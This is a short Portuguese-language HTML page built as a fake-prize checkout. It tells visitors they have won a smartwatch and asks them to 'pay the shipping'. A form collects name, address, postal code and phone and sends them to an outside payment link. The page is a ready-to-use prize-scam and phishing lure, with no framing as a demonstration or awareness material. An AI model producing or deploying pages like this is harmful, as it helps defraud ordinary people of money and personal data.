<!DOCTYPE html>
<html lang="pt-br">
<head>
  <meta charset="UTF-8">
  <title>Parabéns! Quase lá...</title>
  <link rel="stylesheet" href="style.css" />
</head>
<body>
  <nav>
    <a href="index.html">Início</a>
    <a href="produto.html">Produto</a>
    <a href="checkout.html">Checkout</a>
  </nav>

  <div class="checkout-container">
    <h1>🎁 Você ganhou um Smartwatch!</h1>
    <p>Confirme seu endereço e pague o frete:</p>

    <form action="https://pagamento.link.com" method="GET">
      <label>CEP: <input type="text" name="cep" placeholder="00000-000" required /></label>
      <label>Nome Completo: <input type="text" name="nome" required /></label>
      <label>Endereço: <input type="text" name="endereco" required /></label>
      <label>Telefone: <input type="text" name="telefone" required /></label>
      <button type="submit">Pagar Frete e Confirmar</button>
    </form>
  </div>
</body>
</html>